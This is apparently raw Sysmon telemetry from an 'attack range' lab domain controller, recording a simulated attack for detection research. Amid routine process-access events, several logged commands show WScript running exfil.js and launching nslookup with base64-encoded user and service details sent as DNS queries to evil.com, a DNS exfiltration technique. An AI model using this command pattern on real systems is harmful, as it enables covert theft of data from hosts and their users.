14:16:23.111{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.111{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.111{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.111{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.111{2E1864BB-17A1-629A-783D-000000005F02}55521044C:\Windows\System32\WScript.exe{2E1864BB-17B7-629A-6B3F-000000005F02}1292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.112{2E1864BB-17B7-629A-6B3F-000000005F02}1292C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwyfum.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.095{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlszp.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.074{2E1864BB-17B6-629A-693F-000000005F02}48126512C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-6A3F-000000005F02}4592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.057{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.057{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.057{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-6A3F-000000005F02}4592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.057{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.057{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.057{2E1864BB-17B6-629A-683F-000000005F02}55845608C:\Windows\system32\cmd.exe{2E1864BB-17B7-629A-6A3F-000000005F02}4592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.065{2E1864BB-17B7-629A-6A3F-000000005F02}4592C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B6-629A-683F-000000005F02}5584C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlszp.tmp 2>&1 10341000x8000000000000000197891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.010{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-693F-000000005F02}4812C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.010{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-693F-000000005F02}4812C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.010{2E1864BB-17B6-629A-693F-000000005F02}48126512C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-683F-000000005F02}5584C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.995{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-693F-000000005F02}4812C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x800000000000000043928Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:23.932{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F62488CAAF86504FCDE74330C304C93,SHA256=46C89B970BE9E99726CB92245F91DA0CA636171404E5A9055FAC0E1DB673DEF4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.980{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-A93F-000000005F02}1080C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000198475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.165{00000000-0000-0000-0000-000000000000}8<unknown process>-udpfalsefalse127.0.0.1-52498-false127.0.0.1-53domain 10341000x8000000000000000198474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.980{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-A93F-000000005F02}1080C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000198473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.822{00000000-0000-0000-0000-000000000000}5696<unknown process>-udptruefalse127.0.0.1-52491-false127.0.0.1-53domain 10341000x8000000000000000198472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.980{2E1864BB-17B8-629A-A93F-000000005F02}10803288C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-A83F-000000005F02}4484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.964{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-A93F-000000005F02}1080C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.949{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-A83F-000000005F02}4484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.949{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.949{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.949{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.949{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.949{2E1864BB-17A1-629A-783D-000000005F02}5552724C:\Windows\System32\WScript.exe{2E1864BB-17B8-629A-A83F-000000005F02}4484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.955{2E1864BB-17B8-629A-A83F-000000005F02}4484C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlewwoxo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 